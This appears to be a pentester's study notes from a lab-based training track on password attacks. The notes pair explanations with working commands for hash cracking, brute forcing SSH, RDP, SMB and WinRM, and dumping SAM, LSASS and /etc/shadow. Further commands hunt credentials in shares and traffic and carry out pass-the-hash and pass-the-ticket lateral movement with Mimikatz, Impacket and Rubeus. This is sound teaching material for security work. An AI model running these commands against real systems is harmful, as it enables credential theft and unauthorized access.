Password Attack Overview
Password attacks focus on weakening or bypassing authentication by recovering valid credentials from hashes, files, memory, or network workflows. The attacker goal is not just to crack a string, but to turn it into access and prove impact. That is why the process usually mixes offline cracking, remote login checks, and credential harvesting. A clean workflow also documents the source of each credential for reporting.
Authentication relies on something you know, have, or are, but in practice passwords are still the most common factor. Users reuse passwords, pick predictable patterns, and store them in unsafe places, which creates opportunities for attackers. Defenders often rely on lockouts and monitoring, but attackers can still use slow, low-noise methods such as spraying. Understanding where passwords live and how they are processed is the key to efficient testing.
Cracking Foundations and Hash Identification
Cracking starts by knowing the hash format and the attack type you want to apply. Dictionary and brute force attacks are the most common, while rainbow tables are mostly historical due to salt usage and storage costs. Modern cracking relies on fast hashes and wordlist mutations rather than raw brute force. If you guess the hash type incorrectly, all later work is wasted.
Hash identification tools help you map a hash to a cracking mode. For example, hashid can suggest likely algorithms, and Hashcat uses numeric mode IDs. Once you map the type, you can choose the correct tool and attack mode. Always verify a cracked result by matching the original hash.
hashid -j 193069ceb0461e1d40d216e32c79c704
John the Ripper Workflow
John the Ripper is a classic tool that handles many hash formats and file types. Its single mode is great when you know user metadata because it builds guesses from names and usernames. Wordlist mode is the daily workhorse because it tests curated lists quickly. Incremental mode is a statistical brute force that is useful when you have time and no list match.
Use --format whenever you know the hash type so John does not guess wrong. The single mode example below shows how John can crack a hash using account data in the input file. For wordlist cracking, specify the list and the format explicitly. For incremental cracking, you can run a longer session and then use --show to review results.
john --single passwd.txt
john --format=sha512crypt --wordlist=rockyou.txt passwd.txt
john --incremental passwd.txt
john --show passwd.txt
Hashcat Workflow
Hashcat is faster and more flexible for large cracking jobs, especially on GPUs. It uses numeric hash modes and attack modes, so the main input is -m for the hash type and -a for the attack type. The two most common attacks are dictionary mode and mask mode. Dictionary mode uses wordlists and rules, while mask mode targets structured patterns.
A basic dictionary crack uses -a 0 with a list like rockyou. A rules-based crack applies mutation rules, which can add digits, change cases, or append symbols. Mask mode uses placeholders like ?u or ?d to generate candidate strings. Keep masks realistic by matching known password policies.
hashcat -a 0 -m 0 e3e3ec5831ad5e7288241960e5d4fdb8 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 1b0556a75770563578569ae21392630c /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -a 3 -m 0 1e293d6912d074c0fd15844d803400dd '?u?l?l?l?l?d?s'
Wordlists, Rules, and Custom Generation
Wordlists work best when they match the target context. Usernames, project names, and internal jargon make strong seed words for custom lists. Rules can then mutate those seeds into likely password patterns without exploding the search space. This is far more efficient than pure brute force in real engagements.
CeWL can build a wordlist by crawling a target site and extracting words. This is useful when branding or project names appear in public pages and documents. You can then apply a Hashcat ruleset to generate a larger set of candidates. Always keep the original list and the mutated list so you can reproduce results.
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
hashcat --force -r /usr/share/hashcat/rules/best64.rule inlane.wordlist --stdout | sort -u > inlane_mut.list
Cracking Protected Files and Archives
Many environments store credentials in encrypted files or archives. The common flow is to extract a hash from the file, then crack it with John or Hashcat. Tools like ssh2john, office2john, and zip2john handle SSH keys, Office files, and ZIP archives. BitLocker requires bitlocker2john or similar extraction before cracking.
Start by extracting the hash into a file, then run a wordlist attack. If you recover a password, verify it by opening the file or decrypting the container. For BitLocker, extract only the password hash entries and then use the correct Hashcat mode. Keep the original file and extracted hash in your evidence folder.
ssh2john.py SSH.private > ssh.hash
john --wordlist=rockyou.txt ssh.hash
office2john.py Protected.docx > protected-docx.hash
john --wordlist=rockyou.txt protected-docx.hash
zip2john ZIP.zip > zip.hash
john --wordlist=rockyou.txt zip.hash
bitlocker2john -i Backup.vhd > backup.hashes
grep "bitlocker$0" backup.hashes > backup.hash
hashcat -a 0 -m 22100 "$(cat backup.hash)" /usr/share/wordlists/rockyou.txt
Remote Password Attacks on Network Services
Remote attacks test whether a credential actually works against a service. WinRM, SSH, RDP, and SMB are common because they open direct access to systems. Tools like NetExec and Hydra make it easy to test lists in a controlled way. Always consider lockout policies and throttle requests when needed.
NetExec is useful for Windows services because it supports multiple protocols with a consistent syntax. Hydra is quick for brute force against SSH, RDP, or SMB, but it can be noisy if you do not limit speed. Evil-WinRM is a follow-up tool for interactive WinRM access once you have valid credentials. Keep your target, user list, and password list clearly tracked.
netexec winrm 10.129.42.197 -u user.list -p password.list
hydra -L users.txt -P passwords.txt ssh://10.10.10.10
hydra -L users.txt -P passwords.txt rdp://10.10.10.10
hydra -L users.txt -P passwords.txt smb://10.10.10.10
evil-winrm -i 10.129.42.197 -u user -p password
Windows Credential Extraction Basics
On Windows, credentials can be extracted from the SAM database, LSASS memory, or the NTDS.dit database in Active Directory. SAM and SYSTEM hives can be copied locally if you have admin access, then parsed with Impacket. LSASS memory dumps can reveal cleartext or hashed credentials if protections are weak. NTDS.dit extraction gives domain-wide hashes and is high impact.
A common workflow is to save registry hives, move them to your host, and run secretsdump.py. You can then crack NTLM hashes with Hashcat using mode 1000. For LSASS, you can create a minidump and parse it with pypykatz on your machine. Always handle these artifacts carefully because they contain sensitive secrets.
reg save HKLM\SAM SAM.hiv
reg save HKLM\SYSTEM SYSTEM.hiv
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM.hiv -system SYSTEM.hiv LOCAL
hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
pypykatz lsa minidump /home/attacker/loot/lsass.dmp
Linux Credential Extraction Basics
Linux stores password hashes in /etc/shadow, while /etc/passwd holds user metadata. If you obtain both files, you can combine them with unshadow and crack the resulting hashes. This is a direct and reliable workflow when you have root access. The same hashes can be attacked with John or Hashcat.
After creating the combined file, run Hashcat with mode 1800 for SHA512 crypt if appropriate. You can also use John with wordlists and rules. If you cannot access shadow directly, search for credentials in config files, backups, and history files. Keep your search focused on likely locations like /etc, /var/www, and user home directories.
unshadow /etc/passwd /etc/shadow > /tmp/unshadowed.hashes
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt
Credential Hunting in Traffic and Shares
Network traffic can leak credentials in cleartext or weakly protected protocols. Use Wireshark to inspect captures and tools like Pcredz to extract credentials from pcaps. This is effective against legacy protocols or misconfigured services. Always validate recovered credentials with a safe login attempt.
Shared folders are another rich source of secrets. NetExec can spider shares and search for common strings like “passw” in file names or content. Windows tools like Snaffler or PowerHuntShares automate this from a domain context. From Linux, NetExec provides a simple way to enumerate shares and pull data for review.
python3 Pcredz -f capture.pcap -t
netexec smb 10.10.10.0/24 -u users.txt -p passwords.txt --spider "passw"
Lateral Movement with Hashes and Tickets
Pass-the-hash (PtH) lets you authenticate with an NTLM hash when the service accepts NTLM and does not require the plaintext password. It is useful after dumping hashes from SAM, LSASS, or NTDS, especially when cracking is slow. The main constraint is that the target must accept NTLM and the hash must match the account context, such as local versus domain accounts. In practice you use PtH to validate access, run a command, and then pivot to a more stable session.
On Windows, Mimikatz can spawn a process with the hash and inherit that context, which is helpful for local tooling and lateral checks. From Linux, Impacket utilities like psexec, wmiexec, and smbexec can run commands remotely using only the hash. NetExec is useful for validating hashes at scale and executing a quick command with -x. Evil-WinRM provides an interactive WinRM shell when SMB is blocked or noisy, and it supports hash authentication with -H.
RDP PtH is possible but it usually requires Restricted Admin Mode to be enabled on the target. That mode can be turned on with a registry change, after which xfreerdp can pass the hash using /pth. This is useful when you need GUI access, but it is noisy and leaves clear log entries. Always verify policy and scope before attempting it.
Pass-the-ticket (PtT) uses Kerberos tickets instead of NTLM hashes and is common in AD environments. Tickets can be exported from memory with Mimikatz or dumped with Rubeus, then injected into the current session. This allows access to services without ever knowing the plaintext password. Track the ticket user and service because tickets are bound to identity and scope.
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-wmiexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-atexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-smbexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
mimikatz.exe
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt "C:\\Users\\Administrator\\Desktop\\ticket.kirbi"
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt
Reference
This article is based on my personal study notes from the Information Security Foundations track.
Full repository: https://github.com/lameiro0x/pentesting-path-htb